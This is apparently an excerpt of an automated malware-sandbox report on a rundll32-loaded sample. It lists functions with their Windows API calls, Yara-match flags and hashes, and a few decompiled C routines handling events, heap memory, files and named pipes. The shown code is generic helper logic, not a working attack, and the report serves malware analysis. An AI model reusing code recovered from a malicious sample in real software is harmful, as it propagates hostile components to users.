                                  • Part of subcall function 0347A8E9: StrTrimA.SHLWAPI(00000020,03495FCC,00000000,?,03476584,?), ref: 0347A92D
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,?,03476584,?), ref: 0347A939
                                • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 03489E77
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                • String ID:
                                • API String ID: 3208927540-0
                                • Opcode ID: 52c741047fe1ec7c142b526a322e34cc845a4ff83dade90b8eae66e1007b9a47
                                • Instruction ID: f9b3d3741aae2554d711aced7e233202a96a06b0919b9468270810f6a351d9ce
                                • Opcode Fuzzy Hash: 52c741047fe1ec7c142b526a322e34cc845a4ff83dade90b8eae66e1007b9a47
                                • Instruction Fuzzy Hash: 2E017135600B01ABD221AF56AC45F7BBFA8EF91B51F15402BB619BD180D770980AE664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03472530 Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0347253B
                                • Sleep.KERNEL32(0000000A), ref: 03472545
                                • SetEvent.KERNEL32 ref: 0347259C
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034725BB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterEventLeaveSleep
                                • String ID:
                                • API String ID: 1925615494-0
                                • Opcode ID: 0fe82705a4eb82cc0e94292322c22480c24024e02b67d66437181a5e96d32265
                                • Instruction ID: 268d586495a78815b91669b318093c75d6ace120c1453c9c65d16a9e6eb9faf5
                                • Opcode Fuzzy Hash: 0fe82705a4eb82cc0e94292322c22480c24024e02b67d66437181a5e96d32265
                                • Instruction Fuzzy Hash: 93019670640304FBEB11FB61DC4AF9A7AECEB25741F104457E605FE184D7B495048BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03477BD8 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03490DDD: lstrlen.KERNEL32(?,?,00000000,03477BEE), ref: 03490DE2
                                  • Part of subcall function 03490DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 03490DF7
                                  • Part of subcall function 03490DDD: wsprintfA.USER32 ref: 03490E13
                                  • Part of subcall function 03490DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03490E2F
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 03477C06
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 03477C15
                                • CloseHandle.KERNEL32(00000000), ref: 03477C1F
                                • GetLastError.KERNEL32 ref: 03477C27
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                • String ID:
                                • API String ID: 4042893638-0
                                • Opcode ID: 8426a0ae43ea5d97560ee0e8f56da22f4d9f33ba26a2eb72b6b4c72ea4db4202
                                • Instruction ID: 6eb26cdb3e3a1b9e955898c44ca7cc22ae8a2cd2bd1c3928325a74261da785a1
                                • Opcode Fuzzy Hash: 8426a0ae43ea5d97560ee0e8f56da22f4d9f33ba26a2eb72b6b4c72ea4db4202
                                • Instruction Fuzzy Hash: 30F0F471101214BFDB21AF66DC89FEFBEACEF1AAA1F64411BF609AD184C630455186E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484A4B Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcatW.KERNEL32(?,?), ref: 03484A5D
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0347E4AF,?,?,00001000,?,?,00001000), ref: 03484A80
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0347E4AF,?,?,00001000,?,?,00001000), ref: 03484AA2
                                • GetLastError.KERNEL32(?,0347E4AF,?,?,00001000,?,?,00001000), ref: 03484AB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                • String ID:
                                • API String ID: 3370347312-0
                                • Opcode ID: 061a963c8fae5585e069aa8b988a57a4bb8825475f75b46327dd30d29682b41d
                                • Instruction ID: 6c0b322861a05c7ec9705898a53e0caf9f16575dc27bcd84092ad14b27cff99e
                                • Opcode Fuzzy Hash: 061a963c8fae5585e069aa8b988a57a4bb8825475f75b46327dd30d29682b41d
                                • Instruction Fuzzy Hash: 69F0AF31244205BBDB12BF61AC0AF9E3AA9EF16310F240106FA02AC2D0E77151218BAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034788FA Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(0349A060,00000000), ref: 03478906
                                • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 03478921
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347894A
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0347896B
                                  • Part of subcall function 0347DC41: SetEvent.KERNEL32(00000000,?,0348507B), ref: 0347DC56
                                  • Part of subcall function 0347DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0348507B), ref: 0347DC76
                                  • Part of subcall function 0347DC41: CloseHandle.KERNEL32(00000000,?,0348507B), ref: 0347DC7F
                                  • Part of subcall function 0347DC41: CloseHandle.KERNEL32(00000000,?,?,0348507B), ref: 0347DC89
                                  • Part of subcall function 0347DC41: RtlEnterCriticalSection.NTDLL(?), ref: 0347DC91
                                  • Part of subcall function 0347DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 0347DCA9
                                  • Part of subcall function 0347DC41: CloseHandle.KERNEL32(00000000), ref: 0347DCC5
                                  • Part of subcall function 0347DC41: LocalFree.KERNEL32(?), ref: 0347DCD0
                                  • Part of subcall function 0347DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 0347DCDA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                • String ID:
                                • API String ID: 1103286547-0
                                • Opcode ID: 744c3e4eaff52d84cd1a73469f48ca787ddfaab80d7a7c0ac71a0d771b5f31d4
                                • Instruction ID: b8b1eef8942bc3dae87a43f4f1efca83ea414da0c69ae7e2b317b4cc59872f3a
                                • Opcode Fuzzy Hash: 744c3e4eaff52d84cd1a73469f48ca787ddfaab80d7a7c0ac71a0d771b5f31d4
                                • Instruction Fuzzy Hash: BDF0C8357403117BDA31BF22AC0EF4B3E98DF92761F160017B605FE288DA649805D7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348D5F3 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0348D601
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0347DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348D616
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,03473EC6,?,?), ref: 0348D623
                                • CloseHandle.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348D635
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: e0d863238503dd28270bce2497b1bbcaa424ff07f73660b5fc210059201a5a01
                                • Instruction ID: 2ff0fa58ad676ebb0b1e6d8eb3e36834f07f33e811f6495e97e57e4960c86755
                                • Opcode Fuzzy Hash: e0d863238503dd28270bce2497b1bbcaa424ff07f73660b5fc210059201a5a01
                                • Instruction Fuzzy Hash: 5EF089B150530C7FD310BF26DCC4C2BFBDCEB57298B25492FF146A5151C675A8054A74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343227F Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0343227F(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                0x03432289
                                0x0343228d
                                0x034322a2
                                0x034322a4
                                0x034322a9
                                0x034322af
                                0x034322b1
                                0x034322b6
                                0x034322c1
                                0x034322b8
                                0x034322b8
                                0x034322b8
                                0x034322b6
                                0x034322cf

                                APIs
                                • memset.NTDLL ref: 0343228D
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76CC81D0,00000000,00000000), ref: 034322A2
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 034322AF
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 034322C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 9855b5fad46fc729f2e010e0e5334ad3a3dddb120df9e3194ca78e056466433f
                                • Instruction ID: 2521f9ad3fcea3f4b4989c1c1a555d5532c94f0f0df0323c0449e82bf7bc47df
                                • Opcode Fuzzy Hash: 9855b5fad46fc729f2e010e0e5334ad3a3dddb120df9e3194ca78e056466433f
                                • Instruction Fuzzy Hash: 18F05EF510470C7FD320AF62DCC4C2BFBECEB461A8B114D2EF14697211C6B1A8098AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484AC4 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,03474BD6,000000FF,0616B7F0,?,?,0348B7F2,0000003A,0616B7F0), ref: 03484AE0
                                • GetLastError.KERNEL32(?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008), ref: 03484AEB
                                • WaitNamedPipeA.KERNEL32(00002710), ref: 03484B0D
                                • WaitForSingleObject.KERNEL32(00000000,?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C), ref: 03484B1B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                • String ID:
                                • API String ID: 4211439915-0
                                • Opcode ID: 7b932f73e40546573f3f8cfedeb248095e028d09496525d489b103de5e0354d4
                                • Instruction ID: e7b6dcb868cce822b751bf819090eaefc6991defaf25b2a2616497a9817c2567
                                • Opcode Fuzzy Hash: 7b932f73e40546573f3f8cfedeb248095e028d09496525d489b103de5e0354d4
                                • Instruction Fuzzy Hash: 25F06231A01121ABD2217B6AAC4EB5BBA99DF11365F254263F919BE294C6600841C694
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03490DDD Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,?,00000000,03477BEE), ref: 03490DE2
                                • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 03490DF7
                                • wsprintfA.USER32 ref: 03490E13
                                  • Part of subcall function 0348C01F: memset.NTDLL ref: 0348C034
                                  • Part of subcall function 0348C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0348C06D
                                  • Part of subcall function 0348C01F: wcstombs.NTDLL ref: 0348C077
                                  • Part of subcall function 0348C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0348C0A8
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0D4
                                  • Part of subcall function 0348C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0348C0EA
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0FE
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C131
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C136
                                • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03490E2F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                • String ID:
                                • API String ID: 1624158581-0
                                • Opcode ID: f38abb9933d9ba03c2b1c3393e5cf7980a7cba4bf354c108bd97b7ca9b2be2f3
                                • Instruction ID: f418b4c1e4ad1f3df78d4de191c9eb89e8f1a4212dfaac01c36d931fcca63426
                                • Opcode Fuzzy Hash: f38abb9933d9ba03c2b1c3393e5cf7980a7cba4bf354c108bd97b7ca9b2be2f3
                                • Instruction Fuzzy Hash: 51F054315011107BDA216B1AAC09F5B7FECDBD3761F160157F905FE299D624884686A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03476537 Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 03476540
                                • Sleep.KERNEL32(0000000A), ref: 0347654A
                                • HeapFree.KERNEL32(00000000,?), ref: 03476572
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03476590
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: fa4921cdde1c78a2ccbe61e9961aa618a8a57632ccd7f1fca49fd8526c8006a0
                                • Instruction ID: ea5e1568d2dd603b1c662afa16ab8ca74419e18c4d79bfa42a5306ccae1117fb
                                • Opcode Fuzzy Hash: fa4921cdde1c78a2ccbe61e9961aa618a8a57632ccd7f1fca49fd8526c8006a0
                                • Instruction Fuzzy Hash: 44F05E70200240DFE721EF29E849F5A7BE9AF25340F16845BF906FE259D734E844DB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03437607 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03437607() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x343a30c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x343a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x343a30c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x343a2d8; // 0x51f0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x03437607
                                0x0343760e
                                0x03437658
                                0x0343765a
                                0x0343765a
                                0x03437612
                                0x03437618
                                0x0343761d
                                0x03437621
                                0x03437627
                                0x0343762e
                                0x00000000
                                0x00000000
                                0x03437630
                                0x03437635
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03437635
                                0x03437637
                                0x0343763f
                                0x03437642
                                0x03437642
                                0x03437648
                                0x0343764f
                                0x03437652
                                0x03437652
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002CC,00000001,03435E70), ref: 03437612
                                • SleepEx.KERNEL32(00000064,00000001), ref: 03437621
                                • CloseHandle.KERNEL32(000002CC), ref: 03437642
                                • HeapDestroy.KERNEL32(051F0000), ref: 03437652
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 5289e33d020ca8ae77e52003e11f8c7168056c1b00c6b97d75c07343de836de3
                                • Instruction ID: c1eb660eabac5439aba18bed15e6dbebb7c9621ebfe9589317d3af4400234d76
                                • Opcode Fuzzy Hash: 5289e33d020ca8ae77e52003e11f8c7168056c1b00c6b97d75c07343de836de3
                                • Instruction Fuzzy Hash: A4F030B5AC131297DB10FB39989CB873BE8AB19771B080511BD91FF3D9CB60C444D964
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03490B2C Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 03490B35
                                • Sleep.KERNEL32(0000000A), ref: 03490B3F
                                • HeapFree.KERNEL32(00000000), ref: 03490B6D
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03490B82
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 009c6615c6c25488ca1b8fdb96d96f47fc6172ace74cb7a94d7bc0d38f2f0231
                                • Instruction ID: fbc8e20d25eada706c7db13b47aa72f9c24e3a9ed813529110f012b7e23d1657
                                • Opcode Fuzzy Hash: 009c6615c6c25488ca1b8fdb96d96f47fc6172ace74cb7a94d7bc0d38f2f0231
                                • Instruction Fuzzy Hash: BBF0FE742402019FEB19EF55E98AF167BE4AF69305B15404BE806EF359D734EC40CA15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034372C7 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E034372C7() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x343a3cc; // 0x55e95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x343a3cc; // 0x55e95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x343a3cc; // 0x55e95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x343b827) {
					HeapFree( *0x343a2d8, 0, _t10);
					_t7 =  *0x343a3cc; // 0x55e95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x034372c7
                                0x034372d0
                                0x034372e0
                                0x034372e0
                                0x034372e5
                                0x034372ea
                                0x00000000
                                0x00000000
                                0x034372da
                                0x034372da
                                0x034372ec
                                0x034372f1
                                0x034372f5
                                0x03437308
                                0x0343730e
                                0x0343730e
                                0x03437317
                                0x03437319
                                0x0343731d
                                0x03437323

                                APIs
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 034372D0
                                • Sleep.KERNEL32(0000000A), ref: 034372DA
                                • HeapFree.KERNEL32(00000000), ref: 03437308
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 0343731D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 3bbd381a3f9e5dbe4bc40cef96337343a7eb03d8ffcd6aae493c58ded5d7219f
                                • Instruction ID: 5dabd4c10182538498872c22aa52a52589df0f0fb8463b46799b25a40e755dbb
                                • Opcode Fuzzy Hash: 3bbd381a3f9e5dbe4bc40cef96337343a7eb03d8ffcd6aae493c58ded5d7219f
                                • Instruction Fuzzy Hash: C6F0FEB42442019FE718EF54D849F6677F5EB49740B044015FD92EF3A4C770AC11DB1A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03480901 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0348095D
                                • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0347C1F8,00000000), ref: 034809AB
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,03491616,00000000,0347C1F8,0348E6A0,00000000,0347C1F8,034800C3,00000000,0347C1F8,0347306D,00000000), ref: 03480CB6
                                • GetLastError.KERNEL32(?,00000000,?), ref: 03480FB8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorFreeHandleHeapLastmemset
                                • String ID:
                                • API String ID: 2333114656-0
                                • Opcode ID: 63938bcd482dd5be16e26724c19a41232cd14dcce276de44e994513d056e51d7
                                • Instruction ID: e04186dbfe7fa1f64a965bb260379297dc9c5da6a93686a4b70edad9187ca85c
                                • Opcode Fuzzy Hash: 63938bcd482dd5be16e26724c19a41232cd14dcce276de44e994513d056e51d7
                                • Instruction Fuzzy Hash: A3511736614309BEEB11FF61DC41FAF7668AF41310F148067FB15AE190D6F0895A8B6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347174F Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D6F2
                                  • Part of subcall function 0348D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D710
                                  • Part of subcall function 0348D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0348D73C
                                  • Part of subcall function 0348D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D753
                                  • Part of subcall function 0348D698: HeapFree.KERNEL32(00000000,00000000), ref: 0348D766
                                  • Part of subcall function 0348D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D775
                                • GetLastError.KERNEL32 ref: 034717EE
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03483C58
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03483C7C
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,034717D6,?,?,?,?,?,?,?), ref: 03483C8A
                                • HeapFree.KERNEL32(00000000,?), ref: 0347180A
                                • HeapFree.KERNEL32(00000000,?), ref: 0347181B
                                • SetLastError.KERNEL32(00000000), ref: 0347181E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                • String ID:
                                • API String ID: 2451549186-0
                                • Opcode ID: 1527d335e4d2c18641a955f9561d11bf2d5393d89b779954a1401e976e58304a
                                • Instruction ID: dd02287a16b9800d715e6964f2ee0b1bef7f15b0c4d6a492e105532586c48147
                                • Opcode Fuzzy Hash: 1527d335e4d2c18641a955f9561d11bf2d5393d89b779954a1401e976e58304a
                                • Instruction Fuzzy Hash: DD310536900208AFCF12AFAAD8418DEBFB5EF49320B15455BF915AA220D7318A619F94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347A78E Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034863D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?), ref: 034863F5
                                  • Part of subcall function 034863D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03486407
                                  • Part of subcall function 034863D1: wcstombs.NTDLL ref: 03486415
